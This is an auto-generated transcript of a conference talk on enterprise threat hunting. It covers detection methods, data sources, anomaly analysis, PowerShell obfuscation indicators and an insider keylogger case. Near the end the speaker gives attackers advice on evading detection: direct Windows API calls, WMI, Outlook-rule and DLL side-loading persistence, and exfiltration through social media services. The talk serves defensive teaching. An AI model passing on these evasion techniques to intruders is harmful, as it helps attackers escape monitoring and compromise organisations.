Hunt Or Be Hunted

uh hi guys um my name is Alex uh I'm a senior threater with the the team at ccept and uh in today's talk I really want to kind of share my experiences of doing threat hunting uh at scale uh with multiple clients uh thousands of end points uh and and tons of data already um I also wanted to sort of touch on uh the differences between threat hunting and traditional security how they differ why they differ or do they differ at all I guess um also wanted to share some tips for how attackers can up their game you know it's a bit of a free reign at the moment attackers think the the dogs bollocks but there's a lot of things

they can actually do to up their game as well and avoid Advanced uh threat detection hopefully uh by the end of this talk uh you'll be able to take away all the stuff I've talked about go back to your own Enterprises Implement yourselves to actually uh you know supercharge your own security teams uh just a quick intro I said my name is Alex uh it's not Ben Davis contrary to the bsize brochure um and I'm a senior threat Hunter with the team at ccept um I spend my days doing a sort of Investigation actually Hands-On getting into the data um pulling files analyzing memory dumps uh and leing with our clients to to remediate any

issues the other big part of what I do is attack research um understanding what attackers are currently doing here and now in real environments um and making sure that we can actually detect that acccept making sure that's um in our workflow um also got background as a pentest i us actually used to work at MWR um as a regular pentester before joining ccept um and previous to that I was doing some more standard corporate security and and security monitoring v Bing fan massively always encourage people to participate and also I want to be blogger I guess and Twitter fan feel free to to follow so my journey into threat hunting actually started about three years ago

um I was working in a fairly sort of typical security team we had all the usual products maafe the mpoint agent hips uh IPS we have firewalls email analysis all the standard stuff that most Enterprises have but even with all those products um I didn't have access to Raw data and you know working in the security team knowing what attackers were doing they you know they were spinning up processes they were uh installing persistence on our Network and I had no way to see any of that with the current tools I had so I actually ended up writing writing a blog or writing a bit of Pell which I put on my blog later um and all this shell did was

it went out to the estate and it would just pull back data and so I actually ran this across thousands of end points pulled back all this data did least frequency analysis on it and actually found some interesting things kicked off some investigations because of it and at the time I just thought hey I'm just collecting data I'm doing analysis I'm finding the bad guys but I never kind of realized in my head that this was fundamentally a sort of a different approach to security it was being proactive um I wasn't relying on some product to give me some alert to tell me hey there's a bad guy over here I was the one actually doing

that and it's funny you know fast forward three years to where we are present day and and threat hunting and the whole uh proactive approach to Raw data and Analysis you know that's really taken off and it's something I do dayto day so what is threat hunting well um squirrel who are a big threat hunting company um they actually have a a quite nice definition so it's the process of uh proactively and iteratively searching through networks to detect and isolate Advanced threats that invade existing security Solutions a bit of a mouthful but the the key point is really uh first of all proactive um you're not sitting back waiting for the attacker to come to

you you're going to the attacker you're assuming that you're already compromised um and you're going after them um it's also very human driven right uh you're not again rely product it's about the threat Hunters it's the people in your team who know what attack is doing who are actually going after that stuff the other point I wanted to emphasize here is uh that threat hunting is focused primarily on detection and traditionally it was just on detection but actually that's starting to expand um both into prevention and response remediation and really the power of having all of those uh components in one agent or one team even um is efficiency um as a team you can see something

interesting and actually Reach Out collect it analyze it um and then respond to block it or do something about it um I always I always feel pain for all those teams out there who you know don't have access to end points and have to maybe call another team send a request through two weeks later maybe you get the file back you know these kind of processes are just insane you know that's just not uh not adequate to really keep up with mon day attackers so to put sort of threat in in a bit more context I wanted to go back to sort of the age old debate of manual versus automated um and this is quite

sort of relevant I guess to to threat hunting because there's a manual aspect to it um so for the pen testers out there you've probably used uh vulnerability scanners before and they provide awesome value um you can scan at scale get good quality results very quickly there's nothing wrong with this approach I think it's a great approach um however um a lot of you will probably know that in terms of quality the quality will be less with something like nessus you're going to miss things whereas if you have manual pen testers it'll often be a deeper dive into the estate and uh you'll find a lot more issues that nesses for example wouldn't find flipping this actually on its head

and taking its from a sort of a more defensive perspective um traditional security teams have had a very product Focus they rely on someone else telling them when something is going wrong threat hunting is equivalent to pen testing um you've got a human person uh who's there on site looking at data getting hands on um and also they're using tooling so just like a pentester we use nessus sorry nmap for example to assist them um you can do the same in in threat hunting uh you can create rules or you can create automat automatic analysis to highlight things of interest or score things to sort of direct your attention um we'd call this I guess

assisted hunts um other people call it different things but in terms of maturity um traditional security teams will tend to be at that far end um focusing on just what a product tells them to do uh more advanced security teams will be in the Raw data and we'll be at this far end here actually doing manual threaten te so at ccept um we' developed something that we call the Paris model and this really describes the way that we do threat hunting it's a research-driven approach to use case Generation Um and obviously we we're lucky and the being a security company we have a dedicated pen testing team we have a dedicated instant Response Team um and anything these guys find or do in

the wild feeds directly into what we do at ccept so we know what attackers are doing as they discover it themselves and this is really important because you stay current you stay relevant um and the next part of this mall is is this top section um around automation you know obviously automation is a good thing it speeds things up makes you more efficient and when you're competing against an attacker who's also efficient that's really important and so to give a quick example here you know if you look at AV you know AV would be at the top of this pyramid high confidence right you see a hash boom this gets gets contained gets dealt with but say avcs power shell running

what does the AV do does it block it does it allow it um it's it's a tricky one right and this is kind of where threat hunting comes in it tackles that world of gray that traditional approaches just can't handle and so power shell would actually be maybe I don't know that 40% confidence level sometimes it's legitimate sometimes it's malicious but having proper um rules in place to kind of highlight when it may be interesting to look at or more likely to be suspicious that allows you to direct your hunting into it but the key point with this model is it's research driven so in terms of just a quick example here you know red teams will

often use HDA files you guys have probably seen this before Powershell again very prevalent um if you were doing a manual hunt for this you look for mshda you look for powershell.exe uh in process data here um also if you had some uh for example Powershell enhanced login you can actually look at the log data as well um but over time you're looking to automate this you know have some kind of rule or tagging in place to highlight this activity so you don't need to manually query the data every day that's just ridiculous right doing it manually you want to speed it up and over time actually add more filtering get rid of the false positives and add

more context you know if you're looking at um a persistence entry you know say scheduled tasks well you got the name you got the path of the F's loading you've got the frequency how often the scheduled task runs runs there's all those parameters in that meta around it um and even for the file that it's running can you auto submit that to VT for example and get other meta there if you can incorporate this all in a single UI your threatening team will kind of rock it you know they'll they'll be far more efficient in what they do the other two key things here in general for threat hunting is the people and the technology um people's a big one um it's

a human driven approach to security um having smart people who understand attackers so have ocps have comps side degrees have a strong technical grounding is what you need you don't want just help desk staff who answer tickets that's that's not going to cut it really um and second to that in terms of Technology you know having clear endpoint visibility having visibility across as much of your network as possible is por um just cuz there's nowhere for attackers to hide and also having some kind of analysis framework to help you with your analysis to give another quick example of of how we work at ccept some of you guys may have seen this um this was the

recent Shadow broker release um you know C said we we jumped straight on that because we saw the importance of it and and actually researched into some of those payloads you know double Pulsar you guys might heard of before um and we produced some tools to help actually detect that this is what I mean when I sort to say research and and modern and current research this is the kind of stuff that security teams and hunting teams need to be doing to keep up to date so where do you actually begin um I've talked about quite a few bits here and you're wondering where where do I start with all this well there's a tendency I think for people to sort of

um almost just jump into the data like you know if someone gives me data I just think awesome I'm just going to dive in and stuff finding the bad guys um but you want to kind of almost take a step back there um Define your requirements what type of attack are you looking for uh what Threat Level is it Advanced is it commodity um is it an Insider each of these threat profiles will have different requirements or even if you've got specific assets that you want to Target for monitoring it's important to Define that up front in terms of uh use cases and this is kind of really the driver of your requirements you know what do you

actually want to look for um my have actually produced a really awesome framework called called the attack uh framework and this covers really the whole kill chain from start to finish it has a whole series of different techniques uh that describe what attackers are doing um and the best thing about this is a technical you can click on any one of these entries you can see a description a clear description of it and in that it actually shows uh what attacks it's previously been used in it shows you uh preventative remediative uh actions as well um it's a really awesome place to start um and it means you just you don't have to go away and do the research

yourself you can just use this and in our experience at least you know focusing on these real world attacker activities um it's given us the most value so what sort of data sources do you want to focus on so again we're thinking about how we can actually begin to detect those use cases I pre previously brought up there's a tendency I think for organizations to to work at extremes are they loging everything or loging nothing or or log in the wrong thing and anyone who's tried to do this in real life has probably experienced the kind of frustrations of this um if you go log in a turnon of file logs your server is probably not going to like that um and

you'll have slow searching Etc and that doesn't make your security team happy um if you can tune that down and just focus on the things that import that matter most um that's kind of what you want to do the other point to mention here is around expectation um if you tell the business that you're collecting a data source they're expecting that you're monitoring that in the real world it's not that simple uh probably 10% of your time is spent logging data 90% of your time is spent analyzing said data so it's important to explain that to the various businesses areas and and the sea levels to make sure they understand that analysis is a massive component here and

it's actually really hard to do good analysis that takes time it takes maturity so what's the better way of doing this well I'd say look at the kill chain um look at how attackers are actually operating here and look at the data sources that actually apply these are kind of my favorite data sources I'm sure you guys will have your own favorites as well um but the key Point here really is that you can see endpoint covers this whole middle section um attackers arrive on endpoints they move between endpoints and they steal data or make modifications two endpoints if you don't have this data you're going to miss a hell of a lot of attacks and endpoint data is really rich

as well um it's it gives you a lot of context you know the the host name the username um when and where process is executed or or uh files were dropped or network connections were made it's a very rich data source in itself other data sources like firewall as I said before are very weighty they're difficult to work with um they contain very limited information knowing just a port and an IP that's not enough for an investigation there's no context there um and also you don't even have the data like what data was actually sent between those two IPS um in that F log again you don't have it so in terms of priorities you want to focus on the

stuff that really matters here and certainly email analysis you know is where the majority of payloads enter organizations end point where the majority of activity takes place um and even things like bro I love bro um it's also for for for network analysis um definitely those are things to look at one last Point actually on this slide is just around um ease of use um obviously endpoint stuff you can deploy out an agent get coverage very very quickly um for things like doing brol log analysis and network analysis in general um you're obviously going to have to deploy kit um and if you've got 50 offices and you need to deploy kit in each of those offices and get a span

Port set up that's a massive project so again balance efficiency with reward here you know endpoint data you can get very quickly Network and log stuff can sometimes take a bit longer so how do you do analysis um again this is the phase of threat hunting that is the longest and it's the hardest um I'm not going to kind of be around the bush here it's not easy to do um but you need to know how attackers operate um and at a simple level you can actually just look for for bad things like no bad things like ioc's you can look for a hash here's a bad hash awesome kill that machine whatever and more advcer level you want to look at

anomalies try and find those unknowns right and it's a more powerful technique uh that's false positive prone but you know that's that's where I think the value is and with a bit of tuning you can actually get some good value there some people might be a bit angry with me for this for this slide but um let me explain so uh I think there's a whole industry really built around threat intelligence and an ioc such as uh domains IPS hashes these get touted as being very powerful and and everyone should be using this information but the thing about that is that ioc's are good at detecting things that have been seen before it's a reactive approach it's not a proactive

approach um and it's really dangerous to assume that just because you've seen something once means you'll see it again attackers are smarter than that they change infrastructure they change hashes everyone here probably knows that so again why focus on things like ic's I'm not saying there's no value there is some value here but in particular things like um IPS can be very false positive prone and you'll spend all your time just basically waiting through the false positives trying to find the real hits i' say it's far more effective to you know focus on anomalies so ttps um offer a broader approach to detection then not was specific then not was targeted as ioc's and this is kind of what a lot of

the stuff uh is covered in in the micro attack framework stuff is ttps um and I kind of just wanted to run through a few examples here I've divided this up by kind of data ideally in the real world you don't want to do this you want to kind of unify all your data sources and have almost one one unified interface but just for S of Simplicity I've done this so from an endpoint perspective um there's quite quite a few things to look for here um so starting off um binaries um they've been the go-to for a long time for attackers it's it's old school right you just drop a payload and you run it what's nice about them is they

work directly with the windows API they don't often spin up additional processes um and in terms of the detection um you can look for things like the name the publisher the location uh entropy uh VT score there's lots of like metrics you can use here or even use something like ml you know kind the next gen AV approach to this um but then there's many other techniques you know for more stealthy attackers they think okay I'm not I'm not going to drop a binary I'm going to use Windows utilities I'm going to be really smart and stealthy the problem with that is that as a threat Hunter I look for those windows utilities I look for them every

day and it's really easy to spot malicious stuff you know when you run Powershell in a malicious way it's very different to an admin running Powershell so it's actually very easy to spot malicious activity involving those and the same for persistence um almost all attackers use persistence in some form um there's a few key locations if you can monitor them you're probably going to catch the bad guy um a few other points like memory injection I cover on the next slide um but PR escalation UAC bypass more specific techniques here to bypass um existing controls or escalate privileges these are important things to look for as well and one other thing I wanted to say

up with this was as well on this slide was um we don't really see more modern techniques so I don't for those of you who follow like subt for example um he talks a lot about like Ms build reg ASM all the kind of more Cutting Edge stuff we rarely see that in the world um and if you're an attacker I'd strongly recommend using that it's it's probably you know easy to to bypass stuff with it I guess um and also around the permission side you know wry um some mentioned that earlier um things like ICS um a tri um as well as vsss admin um these kind of more specific Windows utilities to modify permissions or

delete a volume Shadow copy um it's worth looking out for on the network side of things um domain information is a big one um you can integrate with third party Services here so domain tools uh passive total not cheap but uh you can get some good results with it if if you got the cash um but yeah looking at classification really history of in the age of the domain um who registered it lot of interesting things there um looking at file analysis stuff on the yre is really nice too um you can look at extension but obviously attackers can change the extension so you can also look at content type headers or even do kind of

mime detection yourself um again a lot this is covered in covered in bro actually by default um any kind of any kind of mismatch between those three things um so you know you see a JPEG coming down um in the extension but it's actually containing like a Powershell script that's over malicious right you can just make a rule to detect that um the last bit I wanted to mention here just around logs um obviously logs will be dependent on the log type and what the type of analysis you want to do um Windows logs just briefly um logins and lockouts those are key uh use cases that people will often check for but even uh more exotic stuff like DC sync

and priv escalation you know dropping a new user in the domain admin group there's some some simple use cases there that can again give you some quick

value so I think there's a w sort of widely held belief um in the security sort of community that if you inject code directly into a running process no one's going to see you you're going to bypass antivirus uh you're not going to leave any files or forensic artifact on the system and it's an awesome technique to use as a bad guy now the reality is that memory anomalies are quite easy to detect from a threat in perspective if you have the right Tooling in place and I've listed out some of the the common techniques on the left here um you guys have probably all heard of them um these are the kinds of techniques that most of the modern

attack Frameworks use you know power sploit Cobalt met sploit they all employ these things and if you actually start looking at the memory regions associated with these kinds of injections the anomalies just jump out straight away um you'll be unable to uh Trace back the module associated with those memory Pages um again it's a massive anomaly it'll just come back with unknown module um you can also scan that memory region and look for key character characteristics like is there a p header there is there an MZ header um and you can wipe these things you can wipe these things if you want and some tools do um but you'll still see for example an unknown module or a suspicious thread

launch within that process this is just one slide about memory injection um my colleagues Matt and will um C they did a whole presentation on this uh that is way more comprehensive and way more awesome than this one slide um it's that that that link below um I'd strongly recommend checking that out if you want to know more about this so uh least frequency analysis um or stacking is one of kind of the Main Stays I guess of the threat Hunting Community um Everyone likes talking about this and this really works from the assumption that attackers will only ever be on one or two boxes in general um and it allows you to spot anomalies

so if you for example um were to look at rankies across an organization they'll be the same run keys on a large number of boxes you know you've got that I know what is it like Java update or whatever that'll be on like a few thousand boxes but then maybe if the attacker drops one specific run key for one specific payload on one box well that's going to appear at the low end of the scale and it's going to be anomalous um I pulled some real data just to give you guys a bit of an example here um highest frequency counts are really high um uh this was just process data and and you can see these

are just standard Windows processes there's nothing weird about that and then you can see at the far end of the scale there's slightly more interesting stuff um you've got maybe uh I think this is like a HP driver you got the Intel agent temporary files and other weird stuff uh I don't know this might be malicious um and I guess this kind of shows the power of how you can use leas frequency analysis and this is quite a limited view um you want to kind of regard this more as just one metric in your analysis um obviously for each of those files like I said before there's a location associated with that a poisha a VT score an entropy rating um

and and that extra context can help you uh with investigation uh relationship based analysis or or graph analysis um covers the way that data points are actually related to each other and this is a a classic attacker example here of an attack Runing a macro within wiw and a CMD dropping out of it um if you were looking at parent process uh relationships you'd say Okay Winward is the parent CMD is the child this is extremely anomalous and if you look across your state you'll be able to see common relationships and uncommon relationships but don't just limit yourself to to win word and CMD obviously there's lots more options here um both in terms of payload delivery so

w script reg serve run de L 32 Powershell regasm there's there's tons um and also parent processes as well um obviously this is for a macro but how about someone delivered a payload through Outlook well then you'd have Outlook as the parent or if someone delivered a link and they clicked in it and and they went through Chrome to download and execute payload well then you'd have a browser as a parent process so kind of think about these other options as well um and also it's not just uh not just processes um so think bigger than that think about user sessions you know how do user sessions relate to each other you know domain admins have very specific profiles that

they they follow they they log on to a few specific servers um whereas regular users they just log on to their workstation if you start doing graphing looking at how user sessions are used you'll start to see some interesting relationships and if they if those um relationships actually change over time say a domain adment account touches a thousand workstations you know that's pretty anomalous so yeah there's other data sets to look at here you know Network traffic user sessions um machine learning is something that's uh been talked about a lot in the security industry and also the wider I guess it Community as well um can't accept at least um you know we use two specific techniques um to to help us

spot anomalies uh the first uh is uh clustering which we actually use as s uh as a data reduction technique so if you take processed data and you cluster it together based on say the arguments you'll see that very similar things come together anomalous things kind of come out the side and that's where you can kind of focus your analysis again it's it's not the be and endle but it's just another metric you can add to your kind of series of metrics that you're using um also time series anomaly detection is quite interesting um I mentioned sort of user sessions a minute ago that's one one application um another is around uh Network transfers and this is actually

what you guys can see up on the board here um so this was actually I think this was downloads um so you can see most people sit at this bottom level here but aggregating over time and using a kind of Baseline approach um you can see there's some anomalies to their usual baselines um and they'll kind of pop out the top here um based on high download volumes another approach here is we just touching on quickly is is supervised classification um so you can use that for files for example um take a thousand bad files take a thousand good files train your ml model build your next gen AV and whatnot um we actually use this

for ransomware protection that's part of our metrics that we use there's some other ones we do as well um but if you're sick of hearing about ML and uh on all the hype uh the other thing to do is is check out our paper um though it's on our on our website this actually cuts through um a lot of the kind of uh hype in the industry and gets to the point what what works and what doesn't work and why so to be able to do the stuff that I've been talking about so far in a scalable and and automated way you know you need to think about automation so I recently watched a movie

called uh called the founder and this is uh for any who've not seen it it's it's basically the story of McDonald's and there's an interesting scene in that movie where they they go to this tennis court and they they get some chalk and they actually draw out uh the McDonald's kitchen on the ground and they try and figure out where to actually Place everything in the most optimal configuration so they can make uh burgers in the most optimal way I guess or something um and this kind of reminded me of how important it is for security teams to be efficient and work together um if you think about McDonald's you know they suffered you know from having other competition in

town you know they had to be fast they had to be efficient they had to be um cost effective it's the same for security teams we're facing attackers who are also fighting efficiency within their own teams um and it's whoever's the fastest whoever's the most agile whoever's the most technically competent is going to win and it's interesting because when you look at less able security teams um they just get stomped on by attackers because they just aren't able to be fast efficient um or technically capable ideally I think you want to review your workflow and figure out where your pain points are you know from detection all the way to response what's taking the longest you know why aren't

things working and the more you can speed up the more awesome uh research you can start doing the more capability you can add and and it ends up as a sort of positive feedback loop so I wanted to share I guess a few more practical tips around automation um I said it before you know data analysis using scoring and rules um or assisted Hunts uh this is really useful you know if you see Powershell running with um any kind of su suspicious arguments you know doing in memory injection for example you want to highlight that up straight away to your team again don't think of it as an alert think of it as something that's interesting and worth

investigating it's not as simple as black and white in threat hunting it's all about scoring and highlighting more interesting things to less interesting things if that makes sense context again adding more metrics to your views making sure your guys can uh see uh all the data they need to and they don't need to maybe click between different systems I I mean that's that's again ridiculous get it all in one page make it easy to use um par and response I talked about before um ticketing is a big one uh I think I think we all hate ticketing to be blunt um it's it's very time consuming um but it's kind of a necessary evil I guess insecurity you

know you have to track instance um you have to collaborate with people you know using ticketing makes sense but again thinking about automation how can you right click on something and have that automatically generate a ticket or you've seen something new over here how do you add that to a ticket automatic you know don't for Don't force your sort of threatening team to have to do everything manually typing this all out payload analysis as well you know Mal analysis can take a long time in general anyway you can sort of speed that up with things like plugins is is really useful and lastly Bots as well really interesting area Bots um and to actually improve uh communication within

the business um this is something that's quite new but I think it's actually really interesting is it's got a lot of Promise going forward in the future so I'm going to skip ahead a little bit here CU think I'm running a bit late um so I want to talk about a quick Insider attack and and this is a real world example this actually something we we detected at counter um and uh if you look at this uh there was actually a binary we saw through uh lease frequency analysis and this was actually in the the startup folder of of multiple systems actually and we actually traced this back and we did a wider search across the estate um

for this file and and found it running on multiple systems and pulling back the file and analyzing it it turned out it was a python key logger um that was spitting out a text file to the local machine um looking at the timelines it was quite interesting because we saw it when it was on on a few hosts and then as we were investigating actually ended up on more hosts and we traced this back through the time stamp analysis and found that um it started on one host and it turns out that this one host was The Insider who'd foolishly run the payload on his own machine machine first um so this was yeah not too difficult an

investigation right um and looking at his box more we found out you he he was actually Distributing this through through advanced ip scanner which is just a tool that allows you to connect to multiple machines and we can see the network data the user session data that Ted all this up you may wonder you know what's the significance of this attack um well this guy was actually trying to escalate privileges to Target an ATM network um to try and steal money um we jumped in there before he was able to do any damage just a big win for us big win for the [Music] client emot uh is a strain of commodity malware um you know and it it actually

came out I think early this year there was a whole sort of campaign like email distribution campaign and um this is something we picked up we saw it being used in the world and it actually used a macro uh with this with this payload here picking apart this payload you can see some pretty obvious things um in terms of detection uh hidden window you think would be really suspicious but it's actually really common admins use it all the time so it's actually rated a three out of 10 so this is kind of based on how severe or important I think it is um web client download this is something that's really anomalous it's definitely something you should be covering if

you're looking at Powershell logs um URLs as well start proces and actually sort of in general from uh winw if you see network comms if you see file rights to specific locations it' be quite interesting obviously this sample here it just basically went out to these sites downloaded a binary and dumped it on the local machine before starting it this is way too easy right you're all thinking hey show me a show me a real example so uh for those who' have seen it Daniel banan he's got an excellent uh product um uh project sorry on on GitHub called invocal fation and this is all about power shell offis and you can turn reasonably easy to read stuff like this

into horrible stuff like this but again you can do uh analysis of this and actually spot this quite easily a few quick points I EX at the top corner here here great indicator to look for strongly recommend it um the bottom part here is decoder St these are static um and used uh in this framework they change slightly you can just signature this um in terms of this middle section obviously this is extremely anomalous you've got all kinds of weird letters numbers there's no spaces um you can do kind of ratio analysis to separate this from more legitimate sort of Po shell and also length is the other big one um anything that gets obus skated grows

massively in length um so it's something you can actually use to to detect it so a lot of the stuff I've talked about uh today has been very sort of threaten and defense focused and for any offensive guys in the audience you may be wondering how do I how do I do offense better um so I put down a few ideas I'm just going to kind of quickly run through this um macros and htas those are the primary ways right now of of delivering payloads don't use them it's my advice um be more creative um focus on social engineering um abuse third party Services um Target users directly or try to use um avenues that

won't create uh say endpoint data or easily trackable data um you know if if you go through a third party service there's no way as a threat hunting team we're going to have those logs there's no way we can trace that um and also targeting personal assets it's it's a gray area this one but I'm just telling you as it is right that's the reality a real will attacker will Target personal assets they'll Target the users directly they won't care if it's corporate or not um they want creds they want access um so yeah we're thinking about terms of execution avoiding all those things I've talked about CMD Powershell all those standard utilities we look for them they're

really blatantly obvious um in terms of the maliciousness um just don't use them if you can um often dropping binaries it could be a better option here um as long as you can bypass AV um and also things like wmi again that can be detected too um but it's just a bit harder or often has less coverage in security teams um the windows API is a really interesting one as well um if you look at the data stack um from sort of top to bottom you know you've got application Level stuff at the top in the middle you've kind of got uh process sort of stuff and then at the bottom you've kind of got direct Windows API stuff and if

you look at how these data sets sort of Stack Up the API stuff is huge you get so much data if you start monitoring the windows API right um so it makes it just not possible to use that data often whereas process data is pretty manageable so as an attacker if you can uh compile a binary and use that to access the windows API and for example to do uh net enumeration instead of using net.exe well you're going to bypass any Windows utilities Like rules just by calling the API direct um and this applies in a few different areas it's it's something that's I i' probably say is a bit under researched um but yeah it's something

that I i' suggest focusing on in terms of persistance don't use the common locations we all know about them we know run keys are used we know service and shedu tasks use don't use them be more creative um WC again better options here often people don't monitor them um office templates Outlet rules uh this is the more kind of on on Vogue it's the latest cool thing pentesters use um again coverage will come for that in the next few months right now though it's I'd argue not very well covered by most security teams D dll side loading is something that's taken off um quite a lot a lot of AP groups have started using this in

more nation state um threat actors it's quite hard to detect you know there's not a single location you can query and say show me all things dll loaded um you instead have to enumerate all the processes and the DLS that they have loaded then do least frequency analysis and that's a bit more longwinded in general if you don't need to use persistence don't don't use it so in terms of xville um there's a few things here I touched on it earlier using legitimate Services as much as possible um Google Facebook Twitter you name it um this came up earlier you know turler the Russian AP group they were using what of Britney Spears's Instagram you know it's that kind of stuff that's

extremely hard for us to detect we we don't have the logs from those services and often that traffic will be encrypted um it's can be quite difficult to to detect that kind of stuff DNS tunneling is another technique that that pentesters love and they think is really cool um again if you got the network traffic it's really easy to detect I'd say avoid it if possible um but again it assumes that the defendant have that data if they don't you know maybe you can use that and lastly going low and slow it's the age- old thing if you take your time as a pen tester don't be noisy don't create spikes on graphs you're probably going to sneak

by so how do you actually do detection yourselves obviously a lot of the stuff I've talked about today is kind of Enterprise level thousands of end points paid for products and stuff you may be wondering how do you actually do this if you wanted to go home and tonight and and play with this stuff there's some open source stuff and that's free to use OS query grr um as well as cismon really love these Technologies anyone can use them um free to deploy and you can just chuckle that data into elastic again it's it's very scalable technology it's efficient easy to use and it's free um and there's a number of different Frameworks you can use um so

Etsy produced 411 uh there's elas which I think was Yelp um elastic DSL that's just out of the box supported by elastic um so there's a lot of options here and lastly infrastructure you'll notice today I've not talked about infrastructure at all um underpinning this whole threat hunting operational thing is a massive infrastructure a team with hundreds of servers and stuff um that's a whole other like talk at a conference to be honest um but again thinking about scalability puppet Chef anable um Docker these are the kinds of Technologies you want to be thinking about so I think over the last few years you know we've seen a bit of a shift um from attackers having almost like free

Reign Over networks to be able to do what they want um compared to now where with the proper uh detection the proper prevention in place um it can be quite hard to compromise an organization um but the only way I think defensive teams can continue to be successful is working closely with the red team you know doing this kind of purple teaming thing um where you all learn from each other you know I I learn how to bypass uh pentesters pentesters learn how to bypass me right and it kind of helps everyone and you know at least in in sort of counter you know a lot of us uh came from a sort of uh pentesting

backgrounds right me myself as was a pentester and you know I saw the state of the the defensive industry and I and I thought F this is awful man like we we got to do better here and I ended up moving across and you know and now I'm in counter doing threat hunting cuz it's it's it's funny you know you I went to infos yesterday and you look at all the vendors and you look at these products and you think wow this is a lot of snake oil like do these products really work you know uh I don't know um maybe they maybe some do um but like a ccept I guess you know we wanted

to improve the situation um we knew that with the right data the right knowledge of attackers we could improve this entire industry um and you saw you know the stuff today you know I'm just sharing what we're doing you know you don't have to pay for this it's it's all there it's all free um and it's funny because I think if you look at the defensive Industries right now it's pretty much like what pentesting was like back in like 2005 or whatever you know we're just starting out we've we've just got nmap or whatever like we don't have all the cool stuff yet we don't have powerit um we're still at the basic level we're still learning we're still

improving so I'd say you know if if anyone in the crowd you know is here and you're looking for a challenge um you're looking to Define an industry and make the metas sploit I guess of the defensive world you know Now's the Time to join um and Now's the Time to I guess make an impact you know um so yeah if you're interested to learn more about threat hunting uh feel free to grab me after this talk or message me message ccept um but yeah that's pretty much it for me thanks for thanks for listen [Applause] guys